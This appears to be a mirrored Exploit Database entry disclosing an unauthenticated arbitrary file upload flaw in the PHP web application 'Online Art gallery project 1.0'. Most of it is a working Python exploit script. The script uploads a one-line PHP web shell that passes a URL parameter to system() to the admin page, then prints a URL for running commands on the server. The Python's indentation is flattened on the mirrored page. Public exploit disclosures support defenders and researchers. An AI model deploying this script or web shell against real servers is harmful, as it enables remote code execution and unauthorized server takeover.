Online Art gallery project 1.0 – Arbitrary File Upload (Unauthenticated)

• Exploit Database
• 42 阅读

• 作者： Ramil Mustafayev
  日期： 2023-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51524/

• # Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
  # Google Dork: n/a
  # Date: 14/06/2023
  # Exploit Author: Ramil Mustafayev
  # Vendor Homepage: https://github.com/projectworldsofficial
  # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
  # Version: 1.0
  # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
  # CVE : n/a
  
  # Vulnerability Description:
  #
  # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
  # Usage: python exploit.py http://example.com
  
  import requests
  import sys
  
  def upload_file(url, filename, file_content):
  files = {
  'sliderpic': (filename, file_content, 'application/octet-stream')
  }
  
  data = {
  'img_id': '',
  'sliderPicSubmit': ''
  }
  url = url+"/Admin/adminHome.php"
  try:
  response = requests.post(url, files=files, data=data)
  except:
  print("[!] Exploit failed!")
  
  if __name__ == "__main__":
  if len(sys.argv) < 2:
  print("Usage: python exploit.py <target_url>")
  sys.exit(1)
  
  target_url = sys.argv[1]
  file_name = "simple-backdoor.php"
  file_content = '<?php system($_GET["c"]);?>'
  
  upload_file(target_url, file_name, file_content)
  print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")